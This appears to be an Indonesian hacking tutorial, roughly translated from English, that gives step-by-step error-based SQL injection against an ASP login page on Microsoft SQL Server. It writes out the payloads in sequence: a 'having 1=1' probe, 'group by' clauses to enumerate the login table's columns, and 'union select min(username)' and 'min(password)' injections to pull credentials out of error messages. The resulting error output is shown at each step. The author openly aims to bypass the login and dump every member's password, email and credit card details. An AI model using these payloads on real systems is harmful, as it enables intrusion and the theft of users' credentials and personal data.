SQL injection adalah jenis aksi hacking pada keamanan komputer di mana seorang penyerang bisa mendapatkan akses ke basis data di dalam sistem dengan sintak2 SQL
Dalam contoh ini saya akan mem-bypass prompt login dan mendapatkan database seluruh anggota (dengan kata sandi), langsung eksekusi
Anda berada di depan prompt masuk yang terlihat seperti "/Administrator/login.asp" ini. Kamu
memerlukan setidaknya satu nama pengguna dan kata sandi. Baiklah, brute forcing adalah noob, jadi kita akan mencoba SQL
Injeksi. Karena kita berbicara tentang injeksi sql BASR sql, saya tidak akan membahas dasar-dasarnya atau sintaksisnya
di sini .. saya kira Anda memiliki pengetahuan dasar. Kami memulai "serangan" kita, dengan kata lain, dengan a
Klausa “memiliki” di bidang nama pengguna misalnya (cukup ketik huruf apa saja untuk kata sandi, atau hanya satu titik).
Seperti ini: 'memiliki 1 = 1 -
Microsoft OLE DB Provider for ODBC Drivers error '80040e14' [Microsoft][ODBC SQL Server Driver][SQL Server]Column 'login.primarykey' is invalid in the select list because it is not contained in an aggregate function and there is no GROUP BY clause. /Administrator/login.asp, line 27
Dann Boom, Kita mendapat kesalahan pertama. sangat bagus. Seperti yang Anda lihat, kesalahan pertama yang kita miliki di sini mengungkapkan
login.primarykey adalah persis apa yang kita butuhkan. Nama tabel (login) dan kolom
name (primarykey) ... sekarang melanjutkan "serangan" menggunakan sql "GROUP BY" ... dan itu akan
terlihat seperti ini: ' group by login.primarykey having 1=1 --
Microsoft OLE DB Provider for ODBC Drivers error '80040e14' [Microsoft][ODBC SQL Server Driver][SQL Server]Column 'login.username' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause. /Administrator/login.asp, line 27/
Boom kita telah menemukan nama kolom lain dan namanya "username". Jadi, kita akan melanjutkan dengan cara yang sama mulai sekarang untuk semua nama kolom di dalamnya
tabel (login, ingat?) Misalnya langkah selanjutnya adalah:
'group by login.primarykey, username having 1=1 --
Jadi Simple...
lakulan seperti itu sampai halaman pencarian NORMAL muncul.
'grup by TABLE_NAME.COLUMN1, COLUMN2, COLUMN3 having 1 = 1 -
Sangat mudah menurut saya. Anda tidak perlu melakukan itu dengan semua kolom jika Anda hanya memerlukan username dan
password, tetapi Anda dapat memiliki email, kartu kredit, nama asli dan hal-hal berguna lainnya dengan cara itu. Sehingga
Langkah selanjutnya adalah mendapatkan username dan password dan Saya mencoba mencari
username di kolom “username” (minimum sebenarnya) yaitu GRATER dari “a”. Ini bisa
menjadi "admin" atau sesuatu (bukan, dalam contoh ini tetapi pengguna memiliki hak admin). Saya melakukan itu dengan
injeksi berikut: 'union select min(username),1,1,1,1 from login where username > 'a'--
Jika Anda tidak tahu untuk apa angka-angka itu, baca beberapa sql. Jadi setelah Anda menjalankan injeksi ini
Anda harus memiliki satu kesalahan kembali sebagai hasilnya. username pertama yang GRATER dari sekedar "a".
Microsoft OLE DB Provider for ODBC Drivers error '80040e07' [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'ah*****' to a column of data type int. /Administrator/login.asp, line 27
Boom, kita berhasil mendapatkan usernamenya, sekarang kita cari passwordnya seperti berikut:
'union select min(password),1,1,1,1 from login where username = 'ah*****' --